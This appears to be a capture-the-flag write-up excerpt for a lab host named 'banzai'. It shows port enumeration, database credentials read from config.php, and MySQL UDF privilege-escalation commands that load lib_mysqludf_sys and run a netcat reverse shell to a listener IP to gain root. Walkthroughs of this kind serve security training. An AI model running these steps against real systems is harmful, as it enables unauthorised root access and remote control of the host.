โโโโโโโโโโโฃ Active Ports
โ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp6 0 0 :::8295 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN -
tcp6 0 0 :::25 :::* LISTEN -
www-data@banzai:/var/www$ cat config.php
cat config.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>
www-data@banzai:/var/www$
Once we have credentials for an internal database we can start enumerating whether it is vulnerable to UDF Privilege Escalation method.
The exploit basically creates a function that executes commands as root.
Depending on the system we download the 32 or 64 bit .so file.
# Find plugin directory
SHOW VARIABLES LIKE 'plugin_dir';
select @@plugin_dir;
# Local method
use mysql;
create table tranilment(line blob);
insert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from tranilment into dumpfile '/<plugin_dir>/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('nc <listener_ip> 1234 -e /bin/bash');
And we have root.
